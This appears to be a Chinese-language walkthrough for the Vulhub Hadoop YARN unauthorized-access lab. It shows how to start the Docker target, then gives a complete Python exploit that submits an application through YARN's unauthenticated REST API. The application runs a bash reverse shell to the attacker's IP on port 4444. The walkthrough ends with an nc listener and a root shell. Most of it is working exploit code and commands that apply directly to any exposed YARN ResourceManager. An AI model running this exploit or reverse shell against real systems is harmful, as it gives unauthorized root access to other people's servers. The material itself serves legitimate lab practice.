先进入vluhub里的靶场目录
vulhub/hadoop/unauthorized-yarn
然后docker-compose up -d拉取环境
docker ps查看镜像是否启动
然后虚拟机ip+端口去访问页面
192.168.127.131:8088
这个是exp写入靶场目录下的exploit.py里面
#!/usr/bin/env python import requests import sys target = 'http://192.168.127.131'#目标机ip lhost = '192.168.10.56' ##将你的本地ip填在这里,使用nc监听4444端口 target = sys.argv[1] #lhost = sys.argv[2] url = target + '/ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + '/ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/4444 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data)
然后sudo nc -lvvp 4444#在攻击机上用NC工具开启4444侦听端口
sudo python3 unauthorized-yarn-hadoop.py http://192.168.127.131:8088#执行exp
就可以反弹shell了
用whoami命令显示我们的权限为root